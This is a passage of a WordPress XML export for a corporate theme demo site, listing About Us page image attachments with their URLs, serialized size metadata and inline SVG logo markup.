											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:630;s:6:"height";i:475;s:4:"file";s:29:"2020/09/image1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:29:"image1-about-us-1-300x226.jpg";s:5:"width";i:300;s:6:"height";i:226;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"image1-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"image1-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"image1-about-us-1-600x475.jpg";s:5:"width";i:600;s:6:"height";i:475;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/features1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>501</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:32:"2020/09/features1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"features1-about-us-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"features1-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"features1-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"features1-about-us-1-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/features2-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>502</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:32:"2020/09/features2-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"features2-about-us-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"features2-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"features2-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"features2-about-us-1-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features3-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/features3-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>503</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features3-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features3-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:32:"2020/09/features3-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"features3-about-us-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"features3-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"features3-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"features3-about-us-1-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/bg1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:49:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>504</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:49:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:49:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:570;s:4:"file";s:26:"2020/09/bg1-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"bg1-about-us-1-300x89.jpg";s:5:"width";i:300;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"bg1-about-us-1-1024x304.jpg";s:5:"width";i:1024;s:6:"height";i:304;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"bg1-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"bg1-about-us-1-768x228.jpg";s:5:"width";i:768;s:6:"height";i:228;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"bg1-about-us-1-1536x456.jpg";s:5:"width";i:1536;s:6:"height";i:456;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"bg1-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"bg1-about-us-1-600x570.jpg";s:5:"width";i:600;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"bg1-about-us-1-1200x570.jpg";s:5:"width";i:1200;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"bg1-about-us-1-1200x570.jpg";s:5:"width";i:1200;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/image2-about-us/</link>
		<pubDate>Tue, 08 Sep 2020 03:38:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-about-us.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>508</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:38:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:38:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-about-us.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image2-about-us.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:516;s:6:"height";i:625;s:4:"file";s:29:"2020/09/image2-about-us.png";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"image2-about-us-1-248x300.png";s:5:"width";i:248;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"image2-about-us-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"image2-about-us-1-516x400.png";s:5:"width";i:516;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"image2-about-us-1-516x600.png";s:5:"width";i:516;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"image2-about-us-1-516x600.png";s:5:"width";i:516;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/attachment/01/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>510</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/01.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 132.8 31.6" style="enable-background:new 0 0 132.8 31.6;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x31_">
	<g>
		<path class="st0" d="M36.1,14.4l0,10.1c0,0.5-0.3,0.9-0.7,1.2l-8.7,5c-0.4,0.2-0.9,0.2-1.4,0L19.1,27c0.9-0.3,1.6-1.2,1.6-2.2    v-2.3c0.1,0.1,4.8,2.9,4.8,2.9c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9l0-5.1c0-0.4-0.2-0.7-0.5-0.9l-4.4-2.8    c-0.3-0.2-0.7-0.2-1.1,0l-6.7,3.6c-0.3,0.2-0.7,0.2-1.1,0l-1.8-1h0l0-1.3c0-0.5,0.3-0.9,0.7-1.2l1.6-0.9l5.4-3.1l0.1-0.1l1.6-0.9    c0.4-0.2,0.9-0.2,1.4,0L28.2,9l0.1,0.1l7.1,4.1C35.8,13.4,36.1,13.9,36.1,14.4z"></path>
		<path class="st0" d="M28.3,8.2l-1.5-0.9c-0.4-0.2-0.9-0.2-1.4,0l-1.6,0.9l-0.1,0.1c-1-0.6-4.9-2.9-4.9-2.9c-0.3-0.2-0.7-0.2-1.1,0    l-4.4,2.5c-0.3,0.2-0.5,0.5-0.5,0.9v0.6l0,4.5c0,0.4,0.2,0.7,0.5,0.9l2.7,1.5l1.8,1c0.3,0.2,0.7,0.2,1.1,0l1.7-1l0,4.9    c-0.1,0-1.6,0.9-1.6,0.9c-0.4,0.2-0.9,0.5-1.4,0.3l-1.6-0.8l0,0l-7.1-4.1c-0.4-0.2-0.7-0.7-0.7-1.2l0-1.7l0-5.3l0-3.1    c0-0.5,0.3-0.9,0.7-1.2l8.7-5c0.4-0.2,0.9-0.2,1.4,0l8.7,5c0.4,0.2,0.7,0.7,0.7,1.2C28.3,7.1,28.3,7.5,28.3,8.2z"></path>
		<path class="st0" d="M20.1,22.2l0,2.8v0.3c0,0.5-0.3,0.9-0.7,1.2L18.4,27l-0.5,0.3l-7.1,4.1c-0.4,0.2-0.9,0.2-1.4,0l-8.7-5    C0.3,26.1,0,25.7,0,25.2v-0.3l0-9.8c0-0.5,0.3-0.9,0.7-1.2L7.6,10v5.2c0,0,0,0.1,0,0.1l-2.4,1.4c-0.3,0.2-0.5,0.5-0.5,0.9l0,4.8    v0.3c0,0.4,0.2,0.7,0.5,0.9l4.4,2.6c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9v-0.6l0,0l0.2,0.1l1.4,0.8    c0.4,0.2,0.9,0.2,1.4,0l0,0l0,0c0.1,0,0.1,0,0.2-0.1L20.1,22.2z"></path>
	</g>
	<g>
		<path class="st0" d="M49.8,23.5c-0.9-0.3-1.6-0.6-2.1-1l0.9-2.1c0.5,0.4,1.1,0.7,1.8,0.9c0.7,0.2,1.4,0.3,2.1,0.3    c0.8,0,1.4-0.1,1.7-0.4c0.4-0.2,0.6-0.5,0.6-0.9c0-0.3-0.1-0.5-0.3-0.7c-0.2-0.2-0.5-0.3-0.9-0.5c-0.3-0.1-0.8-0.2-1.4-0.4    c-0.9-0.2-1.7-0.4-2.2-0.6c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.5-0.6-1.1-0.6-1.9c0-0.7,0.2-1.3,0.6-1.9c0.4-0.6,0.9-1,1.7-1.3    c0.8-0.3,1.7-0.5,2.8-0.5c0.8,0,1.5,0.1,2.2,0.3c0.7,0.2,1.4,0.4,1.9,0.8l-0.9,2.1c-1.1-0.6-2.2-0.9-3.3-0.9    c-0.8,0-1.3,0.1-1.7,0.4c-0.4,0.3-0.6,0.6-0.6,1s0.2,0.7,0.6,0.9c0.4,0.2,1.1,0.4,2,0.6c0.9,0.2,1.7,0.4,2.2,0.6    c0.6,0.2,1.1,0.6,1.5,1c0.4,0.5,0.6,1.1,0.6,1.9c0,0.7-0.2,1.3-0.6,1.9c-0.4,0.6-1,1-1.7,1.3c-0.8,0.3-1.7,0.5-2.8,0.5    C51.6,23.8,50.7,23.7,49.8,23.5z"></path>
		<path class="st0" d="M68.8,21.4v2.2h-9.3v-12h9v2.2h-6.3v2.6h5.6v2.2h-5.6v2.8H68.8z"></path>
		<path class="st0" d="M73.4,23c-1-0.5-1.8-1.3-2.3-2.2c-0.6-0.9-0.8-2-0.8-3.2c0-1.2,0.3-2.2,0.8-3.2c0.6-0.9,1.3-1.7,2.3-2.2    c1-0.5,2.1-0.8,3.4-0.8c1.2,0,2.4,0.3,3.3,0.8c1,0.5,1.8,1.3,2.3,2.2c0.6,0.9,0.9,2,0.9,3.2c0,1.2-0.3,2.2-0.9,3.2    c-0.6,0.9-1.4,1.7-2.3,2.2c-1,0.5-2.1,0.8-3.3,0.8C75.5,23.8,74.4,23.6,73.4,23z M78.7,21c0.6-0.3,1-0.8,1.3-1.4    c0.3-0.6,0.5-1.2,0.5-2c0-0.7-0.2-1.4-0.5-2c-0.3-0.6-0.8-1-1.3-1.4c-0.6-0.3-1.2-0.5-1.9-0.5c-0.7,0-1.3,0.2-1.9,0.5    c-0.6,0.3-1,0.8-1.3,1.4c-0.3,0.6-0.5,1.2-0.5,2c0,0.7,0.2,1.4,0.5,2c0.3,0.6,0.8,1,1.3,1.4c0.6,0.3,1.2,0.5,1.9,0.5    C77.5,21.5,78.1,21.3,78.7,21z"></path>
		<path class="st0" d="M101.1,23.6l0-7.2l-3.5,5.9h-1.2l-3.5-5.8v7h-2.6v-12h2.3l4.5,7.4l4.4-7.4h2.3l0,12H101.1z"></path>
		<path class="st0" d="M106.5,12.7c-0.3-0.3-0.5-0.6-0.5-1.1c0-0.4,0.2-0.8,0.5-1.1c0.3-0.3,0.7-0.4,1.2-0.4c0.5,0,0.9,0.1,1.2,0.4    s0.5,0.6,0.5,1c0,0.4-0.2,0.8-0.5,1.1c-0.3,0.3-0.7,0.4-1.2,0.4C107.2,13.2,106.8,13,106.5,12.7z M106.3,14.4h2.7v9.2h-2.7V14.4z"></path>
		<path class="st0" d="M119.8,15.3c0.7,0.7,1.1,1.7,1.1,3v5.3h-2.7v-4.9c0-0.7-0.2-1.3-0.5-1.6c-0.3-0.4-0.8-0.5-1.4-0.5    c-0.7,0-1.2,0.2-1.6,0.6c-0.4,0.4-0.6,1-0.6,1.9v4.5h-2.7v-9.2h2.5v1.1c0.4-0.4,0.8-0.7,1.3-0.9c0.5-0.2,1.1-0.3,1.7-0.3    C118.2,14.3,119.1,14.7,119.8,15.3z"></path>
		<path class="st0" d="M132.8,11v12.7h-2.5v-1.1c-0.7,0.8-1.6,1.2-2.9,1.2c-0.9,0-1.6-0.2-2.4-0.6c-0.7-0.4-1.3-0.9-1.6-1.7    c-0.4-0.7-0.6-1.5-0.6-2.5c0-0.9,0.2-1.8,0.6-2.5c0.4-0.7,0.9-1.3,1.6-1.7c0.7-0.4,1.5-0.6,2.4-0.6c1.2,0,2.1,0.4,2.8,1.1V11    H132.8z M129.5,20.9c0.4-0.5,0.7-1.1,0.7-1.9c0-0.8-0.2-1.4-0.7-1.9c-0.4-0.5-1-0.7-1.7-0.7c-0.7,0-1.2,0.2-1.7,0.7    c-0.4,0.5-0.7,1.1-0.7,1.9c0,0.8,0.2,1.4,0.7,1.9c0.4,0.5,1,0.7,1.7,0.7C128.5,21.6,129,21.4,129.5,20.9z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/attachment/02/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>511</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/02.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 131.6 29.8" style="enable-background:new 0 0 131.6 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x32_">
	<g>
		<path class="st0" d="M43.3,8.1h2.8v12.5h-2.8V8.1z"></path>
